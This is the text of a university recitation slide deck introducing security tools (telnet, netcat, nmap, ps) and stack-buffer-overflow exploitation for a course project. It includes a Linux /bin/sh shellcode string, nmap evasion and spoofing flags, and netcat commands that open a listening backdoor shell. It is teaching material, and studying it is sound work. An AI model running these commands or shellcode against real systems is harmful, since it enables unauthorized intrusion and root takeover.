Security 101
CPS 110 Recitation
Amre Shakimov Duke University
© Sam McIngvale, Whitney Young, Yan Chen Northwestern university
“Weak Link” of any System/Program?
PROGRAMMER & USERS
Overview
• “C00L t00lz” for “hacking” :) • Project 3 overview and few hints
telnet
• telnet is used for communication with another host using the TELNET protocol. – $ telnet www.cs.duke.edu 80 • telnet is useful for network interaction with servers • telnet traffic is not encrypted and therefore not secure
• The TCP/IP swiss-army knife • netcat is a simple UNIX utility that reads and writes data across network connections. • Simplest usage: – $ nc host port – Creates a TCP connection to the given port on the target host. Standard input is sent to the host and anything that comes back is standard output.
Advanced netcat
• Transferring files – Set-up receiving host to listen on a specific port and put all received data into a file (remember to set a time- out)
• $ nc -vvn -l -p 3000 > file – -l (listens for incoming connections), -vv (verbosity level), -w (timeout), -n (don't reslove Ips) – Set-up sending side to connect to listening host and send a file
• $ nc -vvn xxx.xxx.xxx.xxx 3000 < file
Nmap
• Nmap (“network mapper”) is an open-source port/ security scanner. – http://insecure.org/ • It’s primary function is the discovery and mapping of hosts on a network. – We will use Nmap for port-scanning. • Nmap is consistently voted as one of the most used security tools.
Nmap
• Nmap is capable of: – Host Discovery – Identifying computers on a network. – Port Scanning – Enumerating the open ports on one or more target computers. – Version Detection – Interrogating listening network services listening on remote computers to determine the application name and version number. – OS Detection – Remotely determining the operating system from network devices.
Power of nmap
Nmap
• Note: must be root to run Nmap – Nmap crafts raw packets and sends them over the network interface...on Linux you must be root to use this capability.
• use sudo
Nmap
• Command line options – Host Discovery: • -P0 treat all hosts as online (skip host discovery) – Scan Techniques: • -sS/sT/sA/sW/sM tcp syn/connect/ack/window/maimon scans • -sN/sF/sX tcp null/fin/xmas scans – Port Specification • -p
Nmap
• More Command Line Options – Service/Version Detection • -sV probe open ports to determine service/version info – OS Detection • -O enable OS detection • -A enables OS detection and version detection – Firewall/IDS Evasion • -f fragment packets • -S spoof source address
• -g use given port number Nmap
• Typical Nmap command line: – $ nmap -A -sS -P0 -p 1-65535 scanme.nmap.org • Try it!
netstat/ps • Once you have access to a box...what do you do? • Two useful tools are netstat and ps – netstat – ps
ps
• To see all processes you are running – $ ps • To see all processes running on the machine • $ps ax • $ps aux (to see user information) • To see all processes root is running – $ps aux | grep root
Source Code Availability
• In general, we will always have source code available for analysis. – This mirrors real-world situations. Imagine downloading a program from source. • Things can get tricky when source code is not available. – Bruteforcing becomes extremely helpful. – Reverse engineering is another option.
Project 3
• The goal is to learn security by learning how to view your machine as a 'hacker' • Can be extremely easy (few hours of work) • Can be extremely difficult (sleepless nights) • Coding is tiny (max 20-30 lines) • Code requires a lot of thinking (1 byte may change everything) • We will be happy to help but only with concepts
What you will do in Project 3 • Scan host for open ports (use nmap + parameters) • Determine what service is vulnerable (use nc and simple program) • Write exploit for this service (nc is not enough) and get shell for this machine (source will be available) • Go inside and explore (goal: obtain password for this user – not-root yet) • Exploit different SUIID programs to get root- privileges • Done! (we need all commands you used and source code of all exploits)
Stack Revisited
• Structure • Frame • Ret Address • Why do we care?
Stack Structure
• The stack is used for storing runtime information about function calls – Stored in “Stack Frames”
• Stack structure is processor-dependent – x86, PPC, Sparc
• x86 is the dominant architecture for personal computers
Stack Frame int func(int arg1, int arg2) { char buffer[64]; return 1; } Frame pointer arg2 (ebp) arg1 ret ebp Stack pointer (esp) buffer
We want to overwrite the return address
Ultimate Goal
• In order of importance (to us) – Get root access – Get any access (because it might lead to root access through another vulnerability)
• To launch a shell – system(“/bin/sh”)
How to Get a Shell
• Return to a place in the code that executes a shell – system(“/bin/sh”)
• What if there is no code in the program that executes a shell?
– Shellcode
– Inject code into the application as a string
Shellcode
• Shellcode is compiled code in string format that can be executed to get an interactive shell
char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07" "\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d" "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80" "\xe8\xdc\xff\xff\xff/bin/sh";
Shellcode • Hard to write – Architecture-dependent – Must remove all string-delimiting characters
• Easy to find * – Aleph1's Smashing the Stack
* you need to understand what it does (don't execute shellcode of “rm -Rf ~/” on your machine :)) * Think about shellcode for the Project (launching /bin/sh is not enough for remote exploit).
Injecting Shellcode
• Standard method – Usually, shellcode is stored directly in the buffer that's being overflowed
• Alternate methods – Environment variables – Configuration files
Remote Issues
• How to get a shell across a network – Different shellcode • Determining stack information without debugger • Can't use environment variables or configuration files for shellcode injection
Assumptions
• Return location on the stack is known – This doesn't hold – the stack addresses are affected by the environment in which the program was started
• Shell will be executed locally – We want to be able to attack remote machines
Overcoming Assumptions
• How to deal with changing stack location – Brute force – Nops
• How to get a remote shell – Really complicated shellcode
Brute Forcing With Nops
• Guess every possible return address in address space until getting a shell – Infeasible with 4GB address space (imagine 64bit machines) • Adding nops – Like a ; in C code – doesn't do anything – Adding 200 nops allows the search time to be decreased by a factor of 200
Remote Shell
• There are many solutions • One example
Create shellcode from:
nc -l -p 8000 -c '/bin/sh'
Connect and get shell with:
nc server_address 8000
Advanced netcat
• Shell shoveling using TCP (simple backdoor) – If there is no firewall protecting the target, or if there is a misconfiguration (tcp/53 to all hosts), an attacker can put up a nc-listener that shovels back a shell
• $ nc -l -p 53 -e /bin/sh – -e (execute command on connection) – Then, just connect to the target • $ nc target_ip port